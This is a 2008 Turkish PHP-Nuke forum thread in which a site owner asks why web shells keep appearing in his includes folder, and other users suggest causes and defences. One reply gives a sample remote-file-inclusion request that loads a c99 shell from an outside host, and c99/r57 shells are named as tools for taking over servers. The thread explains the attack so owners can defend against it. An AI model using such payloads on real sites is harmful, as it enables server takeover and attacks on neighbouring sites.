Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 970
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4997 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(8260 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3481 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(10212 okuma, 10 yanıt)
 Nuke Sentinel..
(4584 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(5123 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3587 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(10575 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9687 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5386 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(42613 okuma, 45 yanıt)
 Bu bir saldırmı..
(8545 okuma, 7 yanıt)
 siteme virüs girmis..
(8628 okuma, 6 yanıt)
 Sitedekileri atmak..
(5474 okuma, 2 yanıt)
 Kötü botları engellemek...
(11651 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7431 okuma, 5 yanıt)
 index atılamayan site yap..
(7365 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5555 okuma, 2 yanıt)
 js trojandownloader.agent..
(5955 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7804 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(5188 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(6193 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(14511 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(27655 okuma, 25 yanıt)
 hacklendim mi?..
(6278 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(79699 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4637 okuma, 1 yanıt)
 Site neden Google i banla..
(4353 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6487 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7602 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7633 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(10307 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(7329 okuma, 5 yanıt)
 forum için kod yazma yasa..
(5172 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4921 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5499 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4999 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3583 okuma, 0 yanıt)
 Protector' deki Host İs..
(3605 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7878 okuma, 7 yanıt)
 index dosyasının chmod k..
(4226 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3781 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(8218 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4664 okuma, 1 yanıt)
 Nuke Güvenlik..
(165805 okuma, 257 yanıt)
 bütün index lere iframe e..
(19699 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5926 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(25586 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(19883 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3954 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - includes klasörüne shell basıyorlar
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


includes klasörüne shell basıyorlar
Sayfaya git 1, 2  Sonraki
 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-05-15, 22:21:47    Mesaj konusu: includes klasörüne shell basıyorlar Alıntıyla Cevap Gönder

1 haftadır sürekli includes klasörümün içinde shell buluyorum. host firmamdanda bu konuda biraz destek aldım. includes klasörünün chmod değeri normal. açık nerede olabilir?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-24, 02:11:56    Mesaj konusu: Forum Arası Reklamlar


Başa dön
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2008-05-19, 12:31:17    Mesaj konusu: Re: includes klasörüne shell basıyorlar Alıntıyla Cevap Gönder

chmod ayarlarını kontrol et.Yazma izni verme
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-05-30, 20:42:15    Mesaj konusu: Alıntıyla Cevap Gönder

şuan baktımda yazma izni yok zaten Sad
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
berzankocak
Mesaj: 300+
Mesaj: 300+





Kayıt: May 26, 2007
Mesajlar: 468

MesajTarih: 2008-05-31, 08:29:01    Mesaj konusu: Alıntıyla Cevap Gönder

includes klasörüne shell basıl dığını nasıl anlıyorsununz yada bu shell tem olarak ney beni aydınlatırsanız sevinirim
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
serserialper21
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 02, 2006
Mesajlar: 1660
Konum: Diyarbakır

MesajTarih: 2008-05-31, 09:08:20    Mesaj konusu: Alıntıyla Cevap Gönder

berzankocak :
includes klasörüne shell basıl dığını nasıl anlıyorsununz yada bu shell tem olarak ney beni aydınlatırsanız sevinirim


2 shell yontemı vardır

1. Uzaktan shell cagırma.

Genel olarak server'de yazma izni olan dosyalara uzak'tan shell cagırabılırsınız.

örn ;

/components/com_forum/download.php?phpbb_root_path=http://uyuSsman.by.ru/c99.txt?



Diğer bir yondemde c99.php gibi php uzantılı dosya yapıp bir şekilde server'e upload edip calıstırmaktır

örn

Siteadi.com/c99.php gibi ...




C99 veya r57 shell ile server'ın tamamını bile ele geçirebilme imkanı mevcut onun ıcın tehlikeli bir script.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
berzankocak
Mesaj: 300+
Mesaj: 300+





Kayıt: May 26, 2007
Mesajlar: 468

MesajTarih: 2008-05-31, 09:26:32    Mesaj konusu: Alıntıyla Cevap Gönder

serserialper21 :
berzankocak :
includes klasörüne shell basıl dığını nasıl anlıyorsununz yada bu shell tem olarak ney beni aydınlatırsanız sevinirim


2 shell yontemı vardır

1. Uzaktan shell cagırma.

Genel olarak server'de yazma izni olan dosyalara uzak'tan shell cagırabılırsınız.

örn ;

/components/com_forum/download.php?phpbb_root_path=http://uyuSsman.by.ru/c99.txt?



Diğer bir yondemde c99.php gibi php uzantılı dosya yapıp bir şekilde server'e upload edip calıstırmaktır

örn

Siteadi.com/c99.php gibi ...




C99 veya r57 shell ile server'ın tamamını bile ele geçirebilme imkanı mevcut onun ıcın tehlikeli bir script.

peki bununla ilgili nerden iyi bilgi alabilirim korunma yolları gibi ve bunun gibi tam anlami ile bilgi ala bilecegim öğrenebilecegim kendimi koruyabilecgim
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-05-31, 10:08:19    Mesaj konusu: Alıntıyla Cevap Gönder

valla arkadaşlar hostçuda usanmış durumda. o bi yandan ben bi yandan shell silmekten başımızı kaldıramıyoruz :S sunucudaki diğer sitelerede saldırılıyormuş bendeki shell den. hostçu uyardı. ya bu sorunu pazartesiye kadar çözücem yada siteyi kapatıcam :S
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
berzankocak
Mesaj: 300+
Mesaj: 300+





Kayıt: May 26, 2007
Mesajlar: 468

MesajTarih: 2008-05-31, 10:27:00    Mesaj konusu: Alıntıyla Cevap Gönder

peki nasil anliyorsun sitene shell basıdığını söylermisin bilgim olsun
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-24, 02:11:56    Mesaj konusu: Forum Arası Reklamlar


Başa dön
serserialper21
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 02, 2006
Mesajlar: 1660
Konum: Diyarbakır

MesajTarih: 2008-05-31, 10:56:15    Mesaj konusu: Alıntıyla Cevap Gönder

Arkadas'ın ftp sıne upload yapmıslar herlade hostcu boyle birsey oldugunu kendısıne ıletmıstır.Silmek kalıcı cozum değildir hedefın kaynagını kapatmak lazım.

Shell'den korunmanın yolları dediğim gibi coppermine gibi eklentileri kurmassanız ve herhangi bir klasorun chmod'unu 777 yapmassanız pek birsey yapabileceklerını sanmıyorum.Ayrıca myegaley adlı resim modulunde de shell acıgı var onuda kurmamanızı tavsiye ederim
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
berzankocak
Mesaj: 300+
Mesaj: 300+





Kayıt: May 26, 2007
Mesajlar: 468

MesajTarih: 2008-05-31, 11:33:36    Mesaj konusu: Alıntıyla Cevap Gönder

sağolun
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-05-31, 14:22:00    Mesaj konusu: Alıntıyla Cevap Gönder

sitede hiçbir chmod değişikliği yapmadım. kurduğum tek modül gelalemin oyun modülü :S :S :S
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
is-mail
Mesaj: 500+
Mesaj: 500+





Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul

MesajTarih: 2008-06-12, 15:05:52    Mesaj konusu: Alıntıyla Cevap Gönder

servere shell iki türlü atılır. birincisi hedef site üzerinden, diğeri ise aynı hostta olan bir başka site üzerinden. başka siteye müdahale şansın yok ise ki çoğu zaman olmaz :), kendi root dosyalarının temiz olduğundan emin olmalısın. nuke e çok uzun zaman ara verdim o yüzden olasıklar hangi dosyalardadır hatırlamıyorum. kodları açıp yeniden gözden geçirmem gerekiyor (tabi yayında olan bir sitenin ) ve zaman gerekiyor. şunu da eklemeden geçemicem eğer rootda c99 falan varsa başka siteye saldırdıklarında senin site adından çalıştırılacağı için shell bazı sorunlar yaşayabilirsin başkalarıyla. kaynağına gelince, ucu açık bırakılan değişkenler kodlar arasında olduğunda bu işlem yapılabiliyor. buna rfi açıkları da deniyor ve aslında kapatılması oldukçada kolaydır. dediğim gibi değişken kullanımına dkkat etmek gerekiyor. son olarak ufak bir hatırlatma yapayım, yazım izinlerine güvenmeyin çünkü adamın kod bilgisi iyi ise serverdan kolayca o izni kaldırır.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
komutan1905
Mesaj: 500+
Mesaj: 500+





Kayıt: Sep 26, 2005
Mesajlar: 534
Konum: istanbul

MesajTarih: 2008-06-12, 17:15:32    Mesaj konusu: ssss Alıntıyla Cevap Gönder

http://www.mybbturkiye.com/upload-aciklarini-kapamanin-en-guvenli-yolu-t-6831.html


şu adrese bak Wink


bu senin işine yarayacaktır.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-06-12, 21:09:56    Mesaj konusu: Alıntıyla Cevap Gönder

sanırım bu linkte forumlardaki açıklardan bahsediliyor. bendeki forumlar aktif değilki.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-06-12, 21:39:14    Mesaj konusu: Alıntıyla Cevap Gönder

shell atıyorlarsa bunun bir kaç nedeni olabilir...

1. kullandığınız modüldeki açık
2. yükleme modüllerindeki dosya tipi izni
3. sunucuda system shell shell_exec gibi tehlikeli fonksiyonlardan ileri gelen açıklar...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-06-12, 21:41:12    Mesaj konusu: Alıntıyla Cevap Gönder

dediğim gibi kullandığım tek modül gelalem oyun modülü. yükleme yapılan hiçbir modülde bulunmuyor. hostçu senin siteden basıyorlar diyor. :S:S:S
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-06-13, 02:54:30    Mesaj konusu: Alıntıyla Cevap Gönder

yaprakbannermi böyle birşey var includes içinde o klasör içindeki .js scripti kullanılarak basıyorlar inceledim siteni...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-06-13, 13:18:58    Mesaj konusu: Alıntıyla Cevap Gönder

yaprak reklamda açıkmı varmış Shocked
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
is-mail
Mesaj: 500+
Mesaj: 500+





Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul

MesajTarih: 2008-06-13, 13:56:33    Mesaj konusu: Alıntıyla Cevap Gönder

cok merak ettim. izin varsa siteye bi göz atmak isterim..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-06-13, 14:04:35    Mesaj konusu: Alıntıyla Cevap Gönder

msn imi eklersen ftp bilgilerini verebilirim
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
is-mail
Mesaj: 500+
Mesaj: 500+





Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul

MesajTarih: 2008-06-13, 14:08:05    Mesaj konusu: Alıntıyla Cevap Gönder

yok hayır onlara gerek yok. benim bişey bilmem gerekmiyor, bakalım dışardan hangi kodları nereden yiyor..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
is-mail
Mesaj: 500+
Mesaj: 500+





Kayıt: Feb 07, 2006
Mesajlar: 908
Konum: İstanbul

MesajTarih: 2008-06-13, 14:14:19    Mesaj konusu: Alıntıyla Cevap Gönder

özelden yollarım mesajlarına bak mutlaka.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-06-13, 14:33:41    Mesaj konusu: Alıntıyla Cevap Gönder

asilimy :
yaprak reklamda açıkmı varmış Shocked


onu kullanarak php.ini adından bir dosya yaratmış işin ilginci ini uzantısını siten .php dosyası tarzında okuyor ve adam eylemlerini gerçekleştiriyor bu açık dolaylı yoldan hostinginde mevcut işin özeti hostingin .ini dosyalarına ya erişimi user olarak engelliyecek yada .txt dosyası şeklinde okuma biçimi verecek...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-06-13, 15:08:05    Mesaj konusu: Alıntıyla Cevap Gönder

hostçuyu arayıp durumu açıkladım ancak ini dosyalarını txt formatında çalışrırırlarsa joomla sistemlerinde büyük sorunlar çıkıyormuş. ayrıca hazır elime geçirmişken ioncube hakkında birşeyler sordum. sunuculara ciddi zararlar verdiği ancak yeniden denemeye alacaklarını söylediler. ini dosyaları için htaccess ten bunu ayarlayabilirsiniz dediler. ama ioncube hakkında söylediklerine inanmadım çünkü adamlar ioncube sisteminin şifreleme hakkında olduğunu bile benden öğrendi Very Happy neyse zaten bu saatten sonra gerek kalmadı hiçbişeye çünkü gelalem oyun modülü şuandan itibaren gitti Very Happy giriş yapınca sanalkahve'ye link verilmiş. buradan girilmesi gerektiği yazıyor...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-06-13, 15:16:17    Mesaj konusu: Alıntıyla Cevap Gönder

ilginç ve bunu yapan hostcun insanların güvendiği bir yer ve o yer php hakkında dosyalar hakkında bilgi sahibi değil...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
Sayfaya git 1, 2  Sonraki
1. sayfa (Toplam 2 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok siteye * iframe * basıyorlar suleyman70 Php Nuke Güvenlik 6 2008-04-01, 20:07:46 Son Mesajı Görüntüle
Yeni mesaj yok includes\sql layer.php on line 287 ha... yansima Php-Nuke 3 2008-01-31, 15:11:09 Son Mesajı Görüntüle
Yeni mesaj yok includes/nsngr func.php hatası devrimakgunduz Php-Nuke 0 2007-10-04, 01:14:13 Son Mesajı Görüntüle
Yeni mesaj yok Temel SSH Shell Komutları polibo06 Linux Yönetimi 6 2007-08-17, 16:24:34 Son Mesajı Görüntüle
Yeni mesaj yok includes/page header.php 58 hatası Aliosman Php Nuke Hataları ve Çözümleri 0 2007-07-31, 12:15:54 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright